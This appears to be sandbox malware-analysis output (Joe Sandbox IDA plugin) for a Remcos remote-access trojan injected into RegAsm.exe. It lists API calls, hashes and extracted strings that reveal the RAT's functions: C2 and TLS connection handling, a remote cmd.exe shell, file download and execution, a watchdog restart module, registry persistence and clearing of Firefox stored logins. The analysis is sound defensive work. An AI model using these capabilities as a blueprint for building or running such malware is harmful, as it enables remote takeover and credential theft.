                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                              • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                                                                              • API String ID: 2830904901-3701325316
                                                                                              • Opcode ID: e37af304a9fd979769b8078b14c762969c90b96c3f499a7277212cde09c968c1
                                                                                              • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                                                              • Opcode Fuzzy Hash: e37af304a9fd979769b8078b14c762969c90b96c3f499a7277212cde09c968c1
                                                                                              • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                                                                                              • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                                                              • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                                                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Sleep$ErrorLastLocalTime
                                                                                              • String ID: | $%I64u$5.1.1 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$PSG$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                                                                              • API String ID: 524882891-3007660392
                                                                                              • Opcode ID: fdeabd913f89194a972c5f7ff524d0e6607fcd0e296ccc97aedf736c28b4093d
                                                                                              • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                                                                                              • Opcode Fuzzy Hash: fdeabd913f89194a972c5f7ff524d0e6607fcd0e296ccc97aedf736c28b4093d
                                                                                              • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                              • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                              • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                              • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                              • API String ID: 2490988753-744132762
                                                                                              • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                              • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                                                              • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                                                              • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • connect.WS2_32(?,?,?), ref: 004048E0
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                              • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                              • API String ID: 994465650-2151626615
                                                                                              • Opcode ID: 1f2a59b67e7ec9f08a81800e0f1a4bfe07729ac7d8df955aa20f2323d6d34b4f
                                                                                              • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                                                              • Opcode Fuzzy Hash: 1f2a59b67e7ec9f08a81800e0f1a4bfe07729ac7d8df955aa20f2323d6d34b4f
                                                                                              • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                              • CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                                              • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                                              • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                                                              • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                                                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                                              • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                              • String ID:
                                                                                              • API String ID: 3658366068-0
                                                                                              • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                              • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                                                              • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                              • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetLongPathNameW.KERNEL32(00000000,?,00000208,00000000,?,00000030), ref: 0040DBD5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: LongNamePath
                                                                                              • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                              • API String ID: 82841172-425784914
                                                                                              • Opcode ID: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                                                              • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                                                              • Opcode Fuzzy Hash: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                                                              • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                                                              • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                                                              • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                                                              • __freea.LIBCMT ref: 0044AEB0
                                                                                                • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                              • __freea.LIBCMT ref: 0044AEB9
                                                                                              • __freea.LIBCMT ref: 0044AEDE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap

                                                                                              APIs
                                                                                                • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                              • StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
                                                                                              Similarity
                                                                                              • API ID: CloseCurrentOpenProcessQueryValue
                                                                                              • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion

                                                                                              APIs
                                                                                              • GetLocalTime.KERNEL32(?), ref: 00404F81
                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                                              Strings
                                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                                              Similarity
                                                                                              • API ID: Create$EventLocalThreadTime
                                                                                              • String ID: KeepAlive | Enabled | Timeout:

                                                                                              APIs
                                                                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                              • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                                                              • RegCloseKey.KERNEL32(?), ref: 004137EC
                                                                                              Similarity
                                                                                              • API ID: CloseCreateValue
                                                                                              • String ID: pth_unenc

                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                                                              • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast

                                                                                              APIs
                                                                                              • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                                                              • GetLastError.KERNEL32 ref: 0040D0BE
                                                                                              Similarity
                                                                                              • API ID: CreateErrorLastMutex
                                                                                              • String ID: SG

                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                              • RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                              • RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                              • RegQueryValueExA.KERNEL32 ref: 004135C2
                                                                                              • RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413551
                                                                                              • RegQueryValueExA.KERNEL32 ref: 00413565
                                                                                              • RegCloseKey.KERNEL32(?), ref: 00413570
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              APIs
                                                                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                              • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                              • RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                                                                              Similarity
                                                                                              • API ID: CloseCreateValue
                                                                                              APIs
                                                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
                                                                                              Similarity
                                                                                              • API ID: Info
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: pQG
                                                                                              APIs
                                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448CA4
                                                                                              Similarity
                                                                                              • API ID: String
                                                                                              • String ID: LCMapStringEx
                                                                                              APIs
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BFCF,-00000020,00000FA0,00000000,00467388,00467388), ref: 00448B4F
                                                                                              Strings
                                                                                              • InitializeCriticalSectionEx, xrefs: 00448B1F
                                                                                              Similarity
                                                                                              • API ID: CountCriticalInitializeSectionSpin
                                                                                              • String ID: InitializeCriticalSectionEx
                                                                                              Similarity
                                                                                              • API ID: Alloc
                                                                                              • String ID: FlsAlloc
                                                                                              APIs
                                                                                              • try_get_function.LIBVCRUNTIME ref: 00438E29
                                                                                              Similarity
                                                                                              • API ID: try_get_function
                                                                                              • String ID: FlsAlloc
                                                                                              APIs
                                                                                                • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044F03A,?,00000000), ref: 0044F20D
                                                                                              • GetCPInfo.KERNEL32(00000000,0044F03A,?,?,?,0044F03A,?,00000000), ref: 0044F220
                                                                                              Similarity
                                                                                              • API ID: CodeInfoPageValid
                                                                                              APIs
                                                                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                                                                                                • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                                                                                                • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                                                              • _free.LIBCMT ref: 0044F050
                                                                                              • _free.LIBCMT ref: 0044F086
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorLast_abort
                                                                                              APIs
                                                                                              • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367,00000000), ref: 004485AA
                                                                                              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                                                                              Similarity
                                                                                              • API ID: AddressProc__crt_fast_encode_pointer
                                                                                              APIs
                                                                                              • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8), ref: 0041CB9A
                                                                                              • LocalFree.KERNEL32(?,?), ref: 0041CBC0
                                                                                              Similarity
                                                                                              • API ID: FormatFreeLocalMessage
                                                                                              APIs
                                                                                              • socket.WS2_32(?,00000001,00000006), ref: 00404852
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                                                • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                              Similarity
                                                                                              • API ID: CreateEventStartupsocket
                                                                                              APIs
                                                                                              • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,004151C3,00000000,00000001), ref: 00414F46
                                                                                              • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                                                                                                • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                                                                • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                                                                • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                                                                • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                                                                • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                                                                • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                                                                • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                                                                • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                                                              Similarity
                                                                                              • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                              APIs
                                                                                                • Part of subcall function 00438E14: try_get_function.LIBVCRUNTIME ref: 00438E29
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A48A
                                                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A495
                                                                                              Similarity
                                                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                              • String ID:
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: __alldvrm
                                                                                              • String ID:
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              APIs
                                                                                              • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Startup
                                                                                              • String ID:
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: send
                                                                                              • String ID:
                                                                                              APIs
                                                                                              • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                                                                • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                                                                • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                                                                • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                                                                • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                                                                • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                                                              • GetLogicalDriveStringsA.KERNEL32 ref: 004082B3
                                                                                              • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                                                              • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                                                                • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                                                                • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                              • Sleep.KERNEL32(000007D0), ref: 00408733
                                                                                              • StrToIntA.SHLWAPI(00000000), ref: 00408775
                                                                                                • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                              • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                                              APIs
                                                                                              • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                              • __Init_thread_footer.LIBCMT ref: 00405723
                                                                                              • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                                                              • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                                              • PeekNamedPipe.KERNEL32 ref: 004058BC
                                                                                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                                                • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                                                                              • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                                              • CloseHandle.KERNEL32 ref: 00405A23
                                                                                              • CloseHandle.KERNEL32 ref: 00405A2B
                                                                                              • CloseHandle.KERNEL32 ref: 00405A3D
                                                                                              • CloseHandle.KERNEL32 ref: 00405A45
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                              • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                                              APIs
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                                                                • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                                • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                                                                              • OpenMutexA.KERNEL32 ref: 00412181
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                                                              • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                              • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                                              APIs
                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                                                              • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                                                              • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFile$FirstNext
                                                                                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
